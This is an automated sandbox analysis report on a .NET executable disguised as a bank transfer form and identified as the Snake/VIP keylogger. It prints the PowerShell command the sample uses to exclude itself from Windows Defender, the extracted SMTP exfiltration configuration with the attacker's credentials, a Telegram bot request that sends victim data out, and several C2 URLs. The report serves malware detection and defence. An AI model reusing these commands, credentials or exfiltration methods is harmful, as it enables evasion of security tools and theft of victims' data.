Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bank Transfer Form.exe

Overview

General Information

Sample name:Bank Transfer Form.exe
Analysis ID:1619055
MD5:2f8a0052d88d31c435d71cd69f930f02
SHA1:993258bc6b7f24bf6cddb3c2576d2f5e2d113df2
SHA256:3c00e14ee895971b1e91ad04aebc4970b9526b79ee8413c900acbb9b4ae702b8
Tags:exeMassLoggeruser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Bank Transfer Form.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\Bank Transfer Form.exe" MD5: 2F8A0052D88D31C435D71CD69F930F02)
    • powershell.exe (PID: 7588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Bank Transfer Form.exe (PID: 7596 cmdline: "C:\Users\user\Desktop\Bank Transfer Form.exe" MD5: 2F8A0052D88D31C435D71CD69F930F02)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "obilog@jhxkgroup.online", "Password": "7213575aceACE@@", "Host": "mail.jhxkgroup.online", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "obilog@jhxkgroup.online", "Password": "7213575aceACE@@", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2daa0:$a1: get_encryptedPassword
        • 0x2e028:$a2: get_encryptedUsername
        • 0x2d713:$a3: get_timePasswordChanged
        • 0x2d82a:$a4: get_passwordField
        • 0x2dab6:$a5: set_encryptedPassword
        • 0x307d2:$a6: get_passwords
        • 0x30b66:$a7: get_logins
        • 0x307be:$a8: GetOutlookPasswords
        • 0x30177:$a9: StartKeylogger
        • 0x30abf:$a10: KeyLoggerEventArgs
        • 0x30217:$a11: KeyLoggerEventArgsEventHandler
        00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 18 entries
          SourceRuleDescriptionAuthorStrings
          0.2.Bank Transfer Form.exe.3ddcbf0.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.Bank Transfer Form.exe.3ddcbf0.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.Bank Transfer Form.exe.3ddcbf0.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.Bank Transfer Form.exe.3ddcbf0.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bea0:$a1: get_encryptedPassword
                • 0x2c428:$a2: get_encryptedUsername
                • 0x2bb13:$a3: get_timePasswordChanged
                • 0x2bc2a:$a4: get_passwordField
                • 0x2beb6:$a5: set_encryptedPassword
                • 0x2ebd2:$a6: get_passwords
                • 0x2ef66:$a7: get_logins
                • 0x2ebbe:$a8: GetOutlookPasswords
                • 0x2e577:$a9: StartKeylogger
                • 0x2eebf:$a10: KeyLoggerEventArgs
                • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
                0.2.Bank Transfer Form.exe.3ddcbf0.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3949e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x38b41:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x38d9e:$a4: \Orbitum\User Data\Default\Login Data
                • 0x3977d:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 35 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Bank Transfer Form.exe", ParentImage: C:\Users\user\Desktop\Bank Transfer Form.exe, ParentProcessId: 7404, ParentProcessName: Bank Transfer Form.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", ProcessId: 7588, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Bank Transfer Form.exe", ParentImage: C:\Users\user\Desktop\Bank Transfer Form.exe, ParentProcessId: 7404, ParentProcessName: Bank Transfer Form.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", ProcessId: 7588, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Bank Transfer Form.exe", ParentImage: C:\Users\user\Desktop\Bank Transfer Form.exe, ParentProcessId: 7404, ParentProcessName: Bank Transfer Form.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe", ProcessId: 7588, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-19T14:44:16.064648+010028033053Unknown Traffic192.168.2.449736104.21.80.1443TCP
                2025-02-19T14:44:18.306056+010028033053Unknown Traffic192.168.2.449742104.21.80.1443TCP
                2025-02-19T14:44:20.685248+010028033053Unknown Traffic192.168.2.449746104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-19T14:44:14.505098+010028032742Potentially Bad Traffic192.168.2.449734193.122.130.080TCP
                2025-02-19T14:44:15.473353+010028032742Potentially Bad Traffic192.168.2.449734193.122.130.080TCP
                2025-02-19T14:44:16.598337+010028032742Potentially Bad Traffic192.168.2.449738193.122.130.080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-19T14:44:25.866630+010018100071Potentially Bad Traffic192.168.2.449753149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "obilog@jhxkgroup.online", "Password": "7213575aceACE@@", "Host": "mail.jhxkgroup.online", "Port": "587"}
                Source: 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "obilog@jhxkgroup.online", "Password": "7213575aceACE@@", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
                Source: Bank Transfer Form.exeReversingLabs: Detection: 36%
                Source: Bank Transfer Form.exeVirustotal: Detection: 40%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 3.2.Bank Transfer Form.exe.400000.0.unpackString decryptor: obilog@jhxkgroup.online
                Source: 3.2.Bank Transfer Form.exe.400000.0.unpackString decryptor: 7213575aceACE@@
                Source: 3.2.Bank Transfer Form.exe.400000.0.unpackString decryptor: mail.jhxkgroup.online
                Source: 3.2.Bank Transfer Form.exe.400000.0.unpackString decryptor: obi@jhxkgroup.online
                Source: 3.2.Bank Transfer Form.exe.400000.0.unpackString decryptor: 587
                Source: 3.2.Bank Transfer Form.exe.400000.0.unpackString decryptor:

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Bank Transfer Form.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49735 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
                Source: Bank Transfer Form.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: BxFK.pdbSHA256D source: Bank Transfer Form.exe
                Source: Binary string: BxFK.pdb source: Bank Transfer Form.exe
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 0180F8E9h3_2_0180F631
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 0180FD41h3_2_0180FA88
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F331E0h3_2_06F32DC8
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F30D0Dh3_2_06F30B30
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F31697h3_2_06F30B30
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F32C19h3_2_06F32968
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F3E959h3_2_06F3E6B0
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06F30673
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F3E0A9h3_2_06F3DE00
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F3F209h3_2_06F3EF60
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F3CF49h3_2_06F3CCA0
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F331E0h3_2_06F32DBE
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F3D7F9h3_2_06F3D550
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F3E501h3_2_06F3E258
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F3F661h3_2_06F3F3B8
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F3EDB1h3_2_06F3EB08
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F3D3A1h3_2_06F3D0F8
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06F30853
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_06F30040
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F3FAB9h3_2_06F3F810
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F3DC51h3_2_06F3D9A8
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 4x nop then jmp 06F331E0h3_2_06F3310E

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49753 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2019/02/2025%20/%2020:29:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 193.122.130.0:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 104.21.80.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49735 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2019/02/2025%20/%2020:29:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 13:44:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: Bank Transfer Form.exe, 00000000.00000002.1712733368.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Bank Transfer Form.exeString found in binary or memory: http://tempuri.org/DataTableUsers.xsd
                Source: Bank Transfer Form.exe, 00000000.00000002.1713811273.000000000464E000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000000.00000002.1713811273.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4140066639.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Bank Transfer Form.exe, 00000003.00000002.4138633105.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: Bank Transfer Form.exe, 00000000.00000002.1718877847.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
